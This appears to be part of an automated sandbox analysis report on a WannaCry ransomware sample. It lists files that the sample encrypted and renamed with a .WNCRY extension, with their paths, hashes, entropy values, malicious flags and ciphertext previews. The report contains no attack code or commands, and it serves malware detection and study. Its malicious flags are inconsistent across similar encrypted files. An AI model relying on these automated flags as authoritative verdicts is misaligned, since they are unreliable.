                                Preview:WANACRY!......y=.cE.<.........tJ5.(X4.`....Y,B.z..]c..1......H......W)..(.-}....5......R..(.....aA"Y.J...a.SgHu]....:........E.....%....e.O..V..u.D>.Z....QYTut:........h.F5.....)......U.h.%}.g.:..|c..F8e..............`*..bbe...n.N{.Gv.m8m.!v,*._...R[.kq.~.A.e..............oyRx(+=R.....=....r.*L.z..I......C.b....#K..&..WW..Mg..]no.-..S...r..xY........,.-.DV..8E<S...5.iT.0......z...@..l....k.qN....6O..!......lUt......O!pl]....t...[...Y%.>.........f...J.%3..H.<.-....'\..!.z.()....7ya...&....".V4..M....p.P@..b=.q..b...o.D.5./h.....;.Q.L...}...S....$V...X...,Iv.....v........`[.}Yr..].1....U..[...Xo\2....Yr.....T......7....3.m.A.........WvK....}........yK:...:....\#.o...S.i.G\q.KZ...fb...q.f{.<.u..".J,\...(O...hW#Ht;..WY.6......E.....Z.[.......).?MD...'.(..,..i.T....CF...W.Y...8. .*<.%..Z.\..+yD..U*t.wbv`.])..W."@z.......i.BO.O#J..K.dq......$Y...V&:q....7_..Dh..s...Q...R....._r.J.5..s!...+.U......G.m.m......"..yR[...'J......;..v.-.p6mq3.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_05_51_5411.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.86546786440072
                                Encrypted:false
                                SSDEEP:48:bkXw2+2+91TQtBOnuA530aMnTJcA8jyeORS5ed:oXQP1TXnP530nnTJGjmRSo
                                MD5:31D64C64338BE87DC1980EDAA15B1F99
                                SHA1:476B8EE8FAEF0A9A754FDC8EAC1AFED258F93635
                                SHA-256:7141280735032C220DB3C05D2F22FD87063A051512C169FDC4D8BF8642E9E594
                                SHA-512:398EC9D2AFCE09DC105479F128116AE2A1124CCF30A72801116712181B8929EF60168F6DC415322E59D5000F686B0D8FBC0248B80740F974C7E4B71CC6DF422C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....._..5.%.[.%h'..\K..X.2M.a!N..9PI.)tm...r..?..}.8..X.ki.,?..........U.(.!...~.y.....m..b.H...iz3.'........p.6.....r...!......s..../Em.~i.v.H.>..p........IO.e.#.U5.`zd...&.9k.S....3+?u0.^8.....l@...~..z...4.Pc..].}.>K.Vb......Y.....m.Y.K.$.e.m....................u.!..."N......z...].R.....e..[..;L"...w.~.+.<.^....A.[DsB...[..S......&1....70.l.~^:...>al/...h...../....n..\sX.~.....T.*..Zj-]..T....n.)/.~.G..b..?..C...T.<g.....K.M.z.....F......tO....!. .+..s.....i...c........4yD.Yn}z.....*R...G..~AIk....p..o..K..Z...U_..'[..i.u.!.......7...*...~....,w.M....._....m....@a_......._......o.W.Z.X...W.:Wq..../r.......:.>....<.q...8..O.}bq..^.-..N..uN.\..(.,...%G..N>.yo.h....@.=.... b^....[_...]?..jH.........u=s.;>.Bl..TR...4..(2hD._`..._.4a.Y;.\...[g......:h..d.......5M.X..a..B....k.U6ZA.i?.2*~2..vW._...".$.....3.D..A.U...3 g...Cr.P.:...\....^!$...`ruD..-..O...5..M9.h.M.6.....\..&...&&J1.Vv.W.`..k..._D6...}..B.9..)V.6`...pH..2r...

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_37_00_4351.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.8593253453376954
                                Encrypted:false
                                SSDEEP:48:bkDmXL6wAau+Ev7c9RUlRpAeDcbLsv7sLY:oi+wAas74OTfe07l
                                MD5:27B1086077264B3AE5B151B7AEF0F10E
                                SHA1:442D676F0C000A45D56303D083E7BB1644A55412
                                SHA-256:20460D552D97A0D4308CD901AD2EE59A1769182598BFC5F722C599B8B5746224
                                SHA-512:2C3021D60976B401F2870066654ACCE22DCA8658B5B37578CDD967E284116842DCB3D5039E6AC9F2BEABD41CCDE4660F5DB4E78F10B4871C013A930AF7CF37E5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Xi.....y.wDA..o.....>..!...V.ck.....>'..k?.Kb...s...b2..=..:...L{.e..M..QY.b=o..M....e.Gv.:(.7*.pjO.n......u.S....../.g:4..V,/;..9*o.....O..A@........-8.%F..V.l..U.........p0..jf._.....m^.(.8J2E....8..(.Hbk?e.......*...EE...j@-.'+....@{....1............K.......G,.dH.$..;s..7..r...!P.4...l.z..1..B5..a-!(.c...H.....vMQ...6....3Q.n....)..0.3g....R..q.@..^x..<.u.Fx.,8.~yyc..=...;.q...h.`S....C=n.N.8..I..%...Ep..+=.p..B...l..S..9o..X=.W.]..?sr.z.0......i.._Z.)l..#$]i...V..q...oU@...O..B^....".d }ie....X].3....p....4;........*..=b**.OA...n.<4+....T..../R..E.S..<.3.".....$.IVE..:.....4.<...]).5..\..L.&..O....E..Y*.>.j-./+z_....!QR.......!....(8..Y..X....4o.S.|....=..../*S..i..G.p.c...jcE~...E..."Z9.S>f.oW.....7...Y.j.....(&..x.*.=..Ag...\z..qp..D.zz...7...$v".i4.r.|.nm..=.!H=.XP8...H..8?b..!..H.P;C.].....p...g..a(u.~Y..&...)CA..E..O[..^.....%>i.:..[.}........Pp...l..w....Su..yrc....xG..(.....[...,...p.N@{7..](a...@q.-..%z.8..|....

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_19_38_8611.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1880
                                Entropy (8bit):7.902265530217827
                                Encrypted:false
                                SSDEEP:48:bkdKGekHg3+6xIOWpjG/KE2Oa6c3sHHOS:odKGekA3+6xhajpoaHG
                                MD5:CFAF3A19761F851518D08952B07F6521
                                SHA1:81362181CA1AD87C33C143C58E457B8070149B0F
                                SHA-256:A27E6C54B0869131554352C8F0E4E42A04A9AE4A6E814CBC8266485A1735A573
                                SHA-512:8112F0F3756F7F6F192C9F767E49B77BB4983539411C8791B421325C256468149C8DA0A7973D799CD9889A7707E1F60ED739F811B33FB63F035CB99027EE7955
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......J.~p.....S.U....i...Q.c............va.........e...v....<p......$......#..oQ.'..HU...6..iyV..7(>.*.g.+>.v..J..yQ%..Z......X.`.m..G.f.nwV...p...\...e..T.3.....6.G.....-...C.`'T.I.......t..M..*.).1J.e..p.X..f......>.J9:y}.1.......r.0&..iA..........5.......k....z)...4.q....f...*..D)..a..\ ...xFn(d..6.yk.|.7.Q6.U...QqD^.i..=..z..S.....8A60.x..W.:.%5..[.*... . ..6V`.x-8_J..A;..w. ....xb`d..E6a..Yp3.'...f..pK .G...Hj.E7=.b......{.}.._H.O(x.....M3.$: ..ZS.H3./L.A..;A{s./Z..S.........,.m......V.V41.T....UZ...n.%.h..^Q........^.H Lq$.k...Z......D.....on.I.j...O.gt&......)..c.6..<.C]|.....i.?&...[tJ....a...]..N.B...il.C..4.3E{B$r.`%....P..J...$9.....?...K!z..).....Pir./F]7/.......#.U......A....,l.#\.f......A.v.3bL...D\*..".. .2...r..o8..q.Y.#..o.g.O........X}...6q...K..*.L~...5r7.1...=j...R......O.....B".T.Y.yJ.;tpe.`.U...... .my..i.L.~4..vps..v?.F0...<..!p....jA5.}.n]..z......Z_.q...e2DP$..(..\....[\.6....m..yx.i).I]......a....1Ll.}

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_50_48_4321.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1944
                                Entropy (8bit):7.914587777961285
                                Encrypted:false
                                SSDEEP:48:bkuv0FAzJCdgtW34WPi55KzadPbjvzzzqfNCwo+oqC6adXx+51K:oQJcgAIjAzWP/zqfHob6aXP
                                MD5:49D69851B998724180F2550B91FC2C31
                                SHA1:8FFF4D3EF100421860563DF636CF1A28B9A2E6F4
                                SHA-256:BB34AB8B340C5F608400D3221D74F472DAAEBF7400B733687EDC39BB034811DF
                                SHA-512:2A6CC5E86AF66B8884013A65E8578CCF6C89035BC48CE2028249FB9448368244D167579B386940AE7461771EDF6F4A31438BE1272888E2CB6256A81A3AF00B03
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Z..5....4f.....5..Y.....u.w;m..Z..rO.~f..U..{#.3..o..6.&J.]....8.i..5b*.....bw^.n..k..%....!.. ^(b...2..i.'.=..I{v*4@{...$f...3m..!{.....F..s...dG.(u......I.fhM..~...8...r.FJ..... .Y........Tg*..)..hA.U....r.L....u<.u.:[..... .x......YSebl..j'.2.../....s........O.....u..>..'..U."...2....V..N.N...+`n./..9}LU|.....y.E..tD.|.wj.cx...._o.Sb.f..w .M..x[|b..>...{...R..G...3%*....H....?.q.....f.v...A...*......[..P..``...[.]...........O.... 2m..#..}....2.j...R4M..ab.g.E..:.....;...0.B.~I....#..I.:T..f.......1...oXly~.....F..P.`...F[9sI1.#-Pb.....E2.......,.7N...N$..w.H..q...$..Lv.j.&..+c.wT?.......#....JHl|.f......ea.....z9...@.6....Q2.4K<..m)..k.G........_+....%P.Rb.c<.#..P.>..........l.x+.*.v~..p.J.).....o. ..V..D..u.`.....d.Fx%f...W. 0....&...t[.d...9Z.2.R4..d........l......D*....M..v.NY.,..@.@C.b'..%.B....K.~..U.{.T..-.[I...O.1...yJ.....5Tk_.......C.......E.VD.......Y6M.0.....1..wX.p...!.g(.?.q.DJ..{..k.E.:Jc.hr...b..h.......If}4

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_18_17_07_25_4954.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.865898889140843
                                Encrypted:false
                                SSDEEP:48:bk9hvMolScUd71q/7KPW7tNgXW4Xa4soum3Ncc9+:ovvMooD7mOP0NyzK4s6cp
                                MD5:F5A334730C560A18702C801D99E6E595
                                SHA1:9A0F143E22F992E039B5FCFA9CB8B13A1547B487
                                SHA-256:30F97934AD4DC785A30F645C43FAD89631712C73422513CCD75C153B4158763A
                                SHA-512:D44C49DDD3299354B8F4E1626BA49FE70425C724E0C1C7C70C2F97A2807F9A1364CB8904EA810B7A191C3AF192C61954E124FF97499978F822E777689997F2B4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....T./'er...t.;.].....#.G....q....`.....8..|..09...K(.V.M....a..lY.cP0X..W.;..v..KN`....YJ.H=.K."g..J.*%........2.....[.V...._.a.q..."..BN..bJK.86.....Z".@..5............].t..Q.....4.T8..e..T#..s..V.V...]$...}DD.CVx..c.F...4}.b...A.!.d\%.,...4....v..............}i.X..{A.C....9...>..T2....O^.A6.|..I..T..?......T../ZS'..9~q..V&pe..a....W?..lD...<...<L.#.i.~....%.qHn^.&./.k..D.E`..5].mWa....5.g..=.a...8....>.l..|.z....0..I.uN..n............Eb$..Yv..-bu..._......WR.#.c%....Te.=Z.......E...n......t.....b..n.q=.Y.n*r\..r......x.gs.L1...V..8......oL3.......aH...........B\..k.[.....7...w..w.....H.=0..V#*.P..W.".n...[.|..$.....-..F...a.......v..s....".^...H3q.&\._.o.....>.....7hg...$.2.x|.......>Le..[.L...Ga...bt....a.3.oa..$!..q).d.E-.P.b.9..:E...G(l.Xbgx.:%......)...F..h..U....^....u....O.....s.k..D...:./..|!.9..&.m^JH.7l.SD..4AvG.yh. .k.t.._^....bB....O...H.Ur/U.M...........g...m.(......X...d......K.^....@.X...Q.h}C.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsglobals.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):352008
                                Entropy (8bit):7.9993808630216225
                                Encrypted:true
                                SSDEEP:6144:TTy9MfdlQJiF25R3Tp1Ag0UYce7YPGjimfCYdXmJwE1SSlB2rkCKKtoDCy:TT8MFkiF25nAU3gsuZj211PlcrwAO
                                MD5:815F95E5EB3F533A70FEA15F2BCC6B48
                                SHA1:5D46518F396A4018476C6A943F526A1E2D42EEC9
                                SHA-256:693C29D7877F7EC4B1229127260465FB738A1CF6427EE96F12B49776575F7136
                                SHA-512:E854D870C2CCFD0F9099E3621E109FD37D6A95009E96D87292584C1ED6BC0B97143399B19B420884CDD0B0E9A931D65FEEE027D72A6B0CBC7569EA1FCC1A5C67
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......g.~7..."[y+ ....Y.........Y._+..f6..M.).c...pg..3a..`i.....w.Sy......g....=...f.}...q.W=E....[.us9.c...eme....^.....@.@..L..{.K.:k.;...R...L..=..]n..d/.T../......[.+.i.Tu.......w..P....j..L79....5<......E.b+*@%.`..K.i.1....%c.....$....`Y......n.....]......k`.M.. .}..A^'.@.*8W[....E*........}.K$.X..._...!.40.e.~...A;.4kG.R..Sm.u..P.C.nJ.]b....dw.s.g..o...H9..'...1w.....2q..g.)Q.?...Z..WC.E..y.....v.~r.\3.3..._..=f.......w....(.C[!..S.....\L.j...1.r..c..Bw.h..8.;...a:v.C>|..\U<...9.3...PU.ba._..o.w..z..8.z...i"...3...C.<...,pL7...R.........t./.c.=.+.x..n.0.l$_..W.s..&.>../w...?s..Ype......f.,N..._.0..U..+D&...eZ..5.t.......h^.p...{.y.=&...#....(...m.rW@.8...$....EY....}s...........Eh..hc.9.A....V.a)s.I......T..z...(....6-Ti.;.<.qd=...;..}p.I.;l.c....+..sx{.:L.E._.Hs.....%.at}.........N.;<.y..'...I1..b.U....{......VO...v...7.C$.h......L.S...{........<=.O]X4.....yLd....!Z..X...r........&..u...d....Rd......4.....Jw.......$ir

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appssynonyms.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):243784
                                Entropy (8bit):7.999194677387297
                                Encrypted:true
                                SSDEEP:3072:aB0Hj5JoSXjYVWhQvC83CTwIL987q6pxL6IPV8Oyiz23yzKKv56upVzH2On0MAJI:FOXv0TwIpMq6nh/lh6QzLn0zJt0Q3m
                                MD5:ABA0733B2B79EE8B601A002350CD3988
                                SHA1:AB8C899ABF1EF874571FBB519845B4BF880FC05F
                                SHA-256:F2360EA81155A7680F460278D1FDF21E7E5F44503B6AD45BFEA2A28B14687259
                                SHA-512:6007CE8A7A8B5ACFC8A5C2A5BF84340F03CF6F07DE555832347ECEF341A6A3BCABE33CBA1B6237E6999ABAA6DF28E8A1C9691DB9A90A4EE9DDFC7AB9824BE7C5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....v!i......5.5./..:!.2.....^]..?.]...p.u;5tn.u.?.[e..(.m.s;A....i;...x......-...W..i!y.U.g.....P.p.R....:....N.fb...T.........XE6J...UHe1.qJ6z.......F......AV.V,.....z....>......V.t;P...iN...9....,u}Y.soC^..;\...{.o.a1.p...}.x{)wl.'.wX.*2.b..'uM0{j..!.e....&........74.u.m...\V...I..+:.xc.5;c....v..c.....9..|.E...#[cS.Dc.~.........-.v..n]t..)r?..u.z.ES...._*.....K.>f.....-..."..+....*..i~E:.,...!2.......o..g..J..#......_..y3...1.+O...h.......qM......l*..sGj..!......!?.V.Sn.. .G..T<;"t.u...$7.........!.d...yy.F.cC..:3U.k\&zg...z......3...d.%..E.{|.Y .M.............s.&.\..Q.o$0...=.l..p.0y.`M....J..Y.Gc.(....5y...O.$..lFl:.^s...2. t.*.g!.g....X.......(...L.......u...x.*.%....n{....O.(..Br...s..G.@.+,4".E.... .+...a.%,t..A.....'WP./...u..Y...q...\..}o.....!......)Z.....pE....\....0....hY.../..'a..5F....N...{.....R.w3.![%....FF..g....M(_.z.........>!..:.x.G.O....`....Jc.........(..n..P..Qe.D....x..4....F....9..-..[.'e....+m.._.......I..e.\.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210922101725.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):55320
                                Entropy (8bit):7.996226975058619
                                Encrypted:true
                                SSDEEP:1536:G1VTwyqTRFRDR8H+6q0Ow6KE6ogc7zt1pg:qTpaDRP6Em
                                MD5:51F5DE08B5EBB5E6DD6C52DA3ECA307D
                                SHA1:0806875482B183B74D4556A36395F34F740F0ECB
                                SHA-256:BC9C6D9A51F2FE2B26B32A9D3872431AAD84ABB73EE44174CE1B994D86C3D409
                                SHA-512:30573A30C40FD5D88ADF277F0AA9F152CFA8A5FC5C4A0372F835A44864CE8BBC801EBB2DC98530D51983893E72E1F76FB1F96B66E0D11ACA58D84887A6DC7C23
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......xF.......4....).#.'\l.B..,$..N.\k.y+.O..m.Fe.{,...7.{..............iT.k0......s.k^.23j.m.u..A...iCj)?L..U..].{..@|...4.m.p.DOB..pb.jI4]W.z6....b..lm!Pj.W.)!.,|....Sz...<..7o...I..!..L..}|......i...P.L..A.n!g.C....8'.d:.~....l. t?....m#..R.X............j...A...>V..6.r(...].,t..Q)R_...q.y^B......rE.y..9.].*%:.\...].kx.......]..../..q^....d....g..r.K4..d...z......r..:\...|.Jy&..zw..g....L..hpS!.......r..3..r.OS{..(.}(k.n.u.....vS..;..f./Y..J"VuW*D..oVP....x.j..?..L........{l...v..sL.....z.w.X5&4\.2...u.;...]..~..xp.......A.(d......>...JaBc......."m.>....d..ZT...O.w..#."..._k....[...~.P.%I..>oh....I.*L...bL..G.....Xgc......4].0L?.w..89._a7/c2.....mI.............C..E..f@........AY.....>.b.Y.<./=IR.....I2E.:..^L8_.7pl...+.....&...W.`/.....L.6..?sQ........*L5ik...A.4...h..ZnO.d/VE0.. ...p...Z..z...#.L..~?...'...{Bi..... ..2:.TU|z..+R..m[I#...L.zE..K.d...B...3&....cb.Ho...6~.$.l.....|J....dX.=T.k.....3S...T>i\.<...t.....(...tB..

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210930121453.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):25192
                                Entropy (8bit):7.99326540145318
                                Encrypted:true
                                SSDEEP:384:CX7YeDiWcwGE4wi8Vwd+HgqiHm96/effSu4O3MKrJjD9PU1HFF7U3+hYW4xSdXCT:CoTHIwd+H57uWMyJjK93hYNSc
                                MD5:EC5A11F934EE3C506E344FA2583FED61
                                SHA1:6A7996655731E65ECA60F370CE64221708093BD7
                                SHA-256:DB5CE90812B5020945503B09B98FE323300218A0E2A7C04BFBCEF4D137E62CC8
                                SHA-512:17CF7D87936170CB773E331A68A12F35AD4913D622629CB9A81B4C38AC8223D844A177AE61C9660B2B89AC3C5E2956B6CF3F921B4DE85A3B9A458777C9046ABB
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....C..\.s.=`..Hnu.v.z.1-....V...'.~x.....<5,~.l44..)...p..[.bs......R9..#a....s.,.....A.\...Q.."Q..O.......z.......1tgzaF..[........&..'S.B..o..>.mXnl.|o.O...5...1.6.,..y..O...^.C.#.......6..._.....K...(3.n...e...\.5.m'G.|nj.......1..ys......Ba......o5.q..cU.....7.#.s.J.-{j.....S1&...i...zM .J..v....1NK\\......>.01.Z....:...vsR.y..IO.......0A.r..).2.....c{..|....+X}uuP! ..G...:....t..@.F9a.W....E.w..s.'poh..[..=...0.=.....%..F.~x.Io.*<..)ObX)`........".....$.;).........+.W.......0.Mh!...]r..A:...>$..lGT..4..........e.2-.;%..l6.}8s.(..=H.B.........{..ov..w....]"....../L.X..+S'.mA.".w...P.*...e}N,GN.v&...'.R.>...g.}=.P.s#...\..T....}T.U..q.li...2..l.]x.j\...C......H.#.().L'.........%u.i....E.;...X>...d......Rv.I.:..m..x....1...4....:..1.....>......f.Z.Yd...Z{\..+I...#...Fl.}.(....<{o....=*_7.<5.D)...*F..(-.t.... .v......;\J3`;v.....`.l.H...I..i...4D.......3....p,....bT....-H*.T..u.&...>....j,.{.F..T.@...s.q8........<...

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20220223140416.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):25192
                                Entropy (8bit):7.991684795454581
                                Encrypted:true
                                SSDEEP:768:NVErtMNuWIjRHCFLuSi/ZLUardvUPVAYf98JTt:NVMtCHIguSixBB0CAy
                                MD5:F56B3EB69A0931ECFBB4A63944C06D16
                                SHA1:F40283F9E53C66A46F8BF3861B42985F8BF2F274
                                SHA-256:692C568DE560CBA2FBF386918D03482AB68F8BAA3517B38E0A6FE97A900ABE80
                                SHA-512:64BCFCFEBBD62DA4AA9B9217825D35391AFB82C03288399849537567BDA6C728293319495250A295C2A05F907BFDA1958CEA7AB8A3FC4C5D8F5DC639DB0D4E54
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....^A.<.W.8x.i.H..?.....d........p..S..:VF..H....hm:y...Gy.V$..+..F.{AD...j|e.t.IL.....Y~s.I"...M`.#...=.j...qG.......TC\.R.(..WxlQmG.T:.....*t.V...P.*....&."...Ab..6k...F.F.5...v.O.e}+.......\.(<P.0.j.1........3.P5-[.Z%.F..e.Q.tv.[.]..3.0K.Ax.;...j4.Q....Ba........l[..K..EpS..W.`..>.PJ{.|..n&._.>.!o.Z?......R..H...p.Q2.[.}..J.....%Q,X.........\..c....[..DB+OI.r/k..Mq......"....C..F...Os7&.{.j%(\...ljM.3.:8\lq.v..^..[...G.._k+y_.)-....T.U..v..4.Xw..\.|.t.....MW.....T....1\4.n.Q%C+.'=..0uRB>..k.u...q......W.E(.|....gM.D.E..Ka..../.mL..t}...T1*s..1}h.2......gk9S'..iV.....(Id..&..a=...p..Q..5F...}6F....?...............(_$.4.}..b..=.t.}CW"./.|N9..^.,.Z8K.q.b.f..6S.s...^....U.].../[......k$.f.\.-1....... [..R.W.^.......>..ap..L....u..<.r.Y..82a..G......I-..t..;m-4.mx!..K..R.:.A.;.7U.....Yc.d....*..Ra....<.....9...gx.4.C._.~.E.CEb2........B.O8V......w6G....9.G.5.%...l...m"...W.+r7.7.7...h.....<.....`...3.Q.......*..A.LA..mTH....J..aTr..).

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{435eadfa-ef29-450c-8859-49b8fff38e28}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.994693055365256
                                Encrypted:true
                                SSDEEP:768:5MYM0FsCwu3MrGnPewdyKkySfqYM6LS7PaPbYUlbg2To:5PsCjmePbzS3M6LNA
                                MD5:662F34EBB1DDBE5FEBE8410ED9F73662
                                SHA1:70D2480FA291560DD6E8D2A7F01B68531017D7CF
                                SHA-256:D82FAB63D24811DDE7D2B419BD25037EB8380790EB6BC1313C2A408E1CA0068B
                                SHA-512:25EE210C7191167714751B8F00607D1FCADF90BA3EF3E66B3BA43CCCD35A7ECFB40F2B52C8AC04C7D1DE32DC93C57EC481EC9E9E2489038D6911BCF7899C6717
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......o .r.uM...L0.G...@.5.A....}...i..PDq....R...J..^..3....n\.}..j.hc.....3..7..E...%h........P`..(....R.Fg.6'...:#4V.}hP.j7.....r`...o..^..?e.KXY......4..Dic..JM.......JFv..9...K.;R2...............@.1.o}.<t...g...$..9.6..!R.1.2.\l...V..[~:...f4....v.......H..E)d..W...m|.I,..].n..;=6..S.t.^.N...U.B?.M.S..Nc.....}.r.^...?.~:..,.;.G0..weL.a......tH.%...1../.i.*o...)..%.&.3..Q*....CQF;....Z.].@8...l?..%.w.v.q5...?"*....g..E...R.]!.w.;..RB..I..e..17....7I......@.1z[.."..'%#%...-L..]..P.......zj.......rC.*bj.>..W..ZQ.5..'P...K6.n......#..%......q.@...R.$.....u[...l.q..wI.I.&L#_.j.......9......}n.]....c-@.l....g.X..e.....&51f...NS`....4}..).. fLCy..^~....$g.M....B...I.7.........)sX....KI..mV.}..C... &..Y.X..)g.7.z.....:.....[.tW i...-.T;X...O.3 .fa)z.1...`...@......[.t[...n.....lRF.....[X...Z....J#.K.{...7...}c..A.....%..OY.....-...:.*..m.u.F#....F.$.<...8.4.}..P..XS;'.-.6...w.&......M..'E.....:...i..rqlQ..L.y...;......I

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{88c217c2-58f8-476c-acc3-37a9546e81a8}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995452270200452
                                Encrypted:true
                                SSDEEP:768:Gb0/TpumAlDTnLVyqouJY5/qN1Uxk3H5NzLzKtmtGg/z2/u:28dlCneH5/qQxAFL22K/u
                                MD5:286D154FEA55B0B5DCCF7ED31941AF51
                                SHA1:9D5F547EE531B193EE0DADBEDEE7C4D85436EAF7
                                SHA-256:C6F2D298E0D78974039DB775D076AB09EBEE7EC530EC76BFC10AD23BC788B7C6
                                SHA-512:731E20C4E24C0537AEF51EA55F1DC08A51CCA643CE1A8B607B436876789332A305D231093FF54B975E3613DF1EDC61E8B89D18EF55CD70E6B1F8C6C6885B6C75
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....E..C.Lw...r?.p..4...u9=led......b.....t....Q.n......%.'...q..O.Q.....&a.H.....\.j?...k.%.........5<-.?...(./0".A..g|'U....P..._......Lq..s..G16f..........#.3..T8aOG..QH.K.c....!.*.Mt-\l....Cy..|...e..}|."tn...9..T.2..1tt.........D....5i.........v.........K.....E....%...Z".w....I.......;6h2.f..:o.rR....0....!!<...E..^..-.e.......C...wu...F...9...Y......n..0..<....tN..2......0p.V...?....q..Z..:.tjE.!/...f..I.0.pw2.^;.. !.G...*...q:.........(|uF....3........CBA.W7kz..uy.......$@....P..=.m......N.f.........r..q$.:...Y"........6E.,q...x.a.q.d).....a.l}..i=....S....X.%....|O.j..W.?TQ..a..s..==.{........e.;},)j#..L.S...t....Um..fr.T..6$..:g.#......J.T.z'....!k._.....d.......).....6.D.l...[.....O...{..zf.M...x.E.rr..CCj..s.x..l.D=..g..qr........1.rI..K....8j.@...g.......;.+:.Wz.....`.(.4F.wb.)%?.2C+B..)[.... n.l.~Ib.zfVC...3.L..|......W................d..........>....9.:.....k..D...=..v*8t.0...`t......1.r4.....2.E0.`.^.D.2.:2...P.K..._.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995283190461034
                                Encrypted:true
                                SSDEEP:768:weKVzjpD5WTEqTlNVilU+vhYfyMpDmO+8s0FEsjiibSB4L/psMJ9u:wZVz1D5EEqRNWvhYfBpqO+8soSJM7u
                                MD5:A876257E7834F3EAF7C38E30214D409B
                                SHA1:701965B61A9B43678C5A568270637CD73371BEF2
                                SHA-256:4C5F743EA3917D33739D9FA22C3364310473BAC0994237556D776D356D2CC8F9
                                SHA-512:07744EB1E1559629A690C9F3E5E6BAA83EB6BC160BEDE439437E0A2278836CD9FDCA7C8EA8158B17E57C4B09254695F280E0BF15317175E6B1E20E97D075EADD
                                Malicious:true
                                Reputation:unknown
